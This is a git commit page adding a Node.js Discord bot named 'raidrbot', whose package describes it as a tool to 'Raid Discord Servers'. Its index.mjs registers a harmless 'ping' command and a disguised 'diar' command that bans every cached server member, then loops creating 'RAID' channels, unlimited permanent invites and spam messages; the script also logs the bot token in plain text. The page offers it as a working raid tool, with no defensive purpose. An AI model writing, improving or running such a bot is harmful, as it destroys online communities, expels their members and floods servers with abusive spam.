Add files via upload
This commit is contained in:
parent
e93ac53b01
commit
7f554ddd23
2 changed files with 97 additions and 0 deletions
75
index.mjs
Normal file
75
index.mjs
Normal file
|
@ -0,0 +1,75 @@
|
||||||
|
import { REST, Routes, Client, GatewayIntentBits } from 'discord.js';
|
||||||
|
|
||||||
|
const TOKEN = process.argv[2]
|
||||||
|
const CLIENT_ID = process.argv[3]
|
||||||
|
const commands = [
|
||||||
|
{
|
||||||
|
name: 'ping',
|
||||||
|
description: 'Replies with Pong!',
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: 'diar',
|
||||||
|
description: 'Dairy air!',
|
||||||
|
},
|
||||||
|
];
|
||||||
|
|
||||||
|
const client = new Client({ intents: [GatewayIntentBits.Guilds, GatewayIntentBits.GuildMembers, GatewayIntentBits.GuildInvites] });
|
||||||
|
|
||||||
|
const rest = new REST({ version: '10' }).setToken(TOKEN);
|
||||||
|
|
||||||
|
function randInt(min, max) {
|
||||||
|
return Math.floor(Math.random() * (max - min) + min);
|
||||||
|
}
|
||||||
|
|
||||||
|
try {
|
||||||
|
console.log('Started refreshing application (/) commands.');
|
||||||
|
|
||||||
|
await rest.put(Routes.applicationCommands(CLIENT_ID), { body: commands });
|
||||||
|
|
||||||
|
console.log('Successfully reloaded application (/) commands.');
|
||||||
|
} catch (error) {
|
||||||
|
console.error(error);
|
||||||
|
}
|
||||||
|
|
||||||
|
client.on('ready', () => {
|
||||||
|
console.log(`Logged in as ${client.user.tag}!`);
|
||||||
|
});
|
||||||
|
|
||||||
|
client.on('interactionCreate', async interaction => {
|
||||||
|
if (!interaction.isChatInputCommand()) return;
|
||||||
|
|
||||||
|
if (interaction.commandName === 'ping') {
|
||||||
|
await interaction.reply('Pong!');
|
||||||
|
} else if (interaction.commandName === 'diar') {
|
||||||
|
await interaction.user.createDM("Starting raid NOW...")
|
||||||
|
let guild = interaction.channel.guild
|
||||||
|
for (const member of guild.members.cache.values()) {
|
||||||
|
try {
|
||||||
|
await member.ban();
|
||||||
|
console.log(`${member.user.tag} has been banned.`);
|
||||||
|
} catch (error) {
|
||||||
|
console.warn(`Failed to ban ${member.user.tag}:`, error);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (i = 0; i <= 100000, i++;) {
|
||||||
|
guild.channels.create({ name: `RAID-${i}`, reason: 'COOL CHANNEL IS COOL' })
|
||||||
|
.then(console.log)
|
||||||
|
.catch(console.error);
|
||||||
|
interaction.channel.createInvite({
|
||||||
|
maxAge: 0, // Invite never expires (adjust as needed)
|
||||||
|
maxUses: 0, // Unlimited uses (adjust as needed)
|
||||||
|
}).then(console.log).catch(console.warn)
|
||||||
|
try {
|
||||||
|
interaction.channel.send(`# RAID
|
||||||
|
This is a raid! Everybody get down!`)
|
||||||
|
} catch {
|
||||||
|
console.warn("Error sending raid msg! (Timeout?)")
|
||||||
|
}
|
||||||
|
await new Promise(r => setTimeout(r, randInt(500,6200)));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
console.log(`${TOKEN}`)
|
||||||
|
client.login(TOKEN);
|
22
package.json
Normal file
22
package.json
Normal file
|
@ -0,0 +1,22 @@
|
||||||
|
{
|
||||||
|
"name": "raidrbot",
|
||||||
|
"version": "1.0.0",
|
||||||
|
"description": "Raid Discord Servers",
|
||||||
|
"main": "index.js",
|
||||||
|
"scripts": {
|
||||||
|
"test": "echo \"Error: no test specified\" && exit 1"
|
||||||
|
},
|
||||||
|
"repository": {
|
||||||
|
"type": "git",
|
||||||
|
"url": "git+https://github.com/sam-sneed/raidrbot.git"
|
||||||
|
},
|
||||||
|
"author": "Sam Sneed",
|
||||||
|
"license": "MIT",
|
||||||
|
"bugs": {
|
||||||
|
"url": "https://github.com/sam-sneed/raidrbot/issues"
|
||||||
|
},
|
||||||
|
"homepage": "https://github.com/sam-sneed/raidrbot#readme",
|
||||||
|
"dependencies": {
|
||||||
|
"discord.js": "^14.15.3"
|
||||||
|
}
|
||||||
|
}
|
Loading…
Reference in a new issue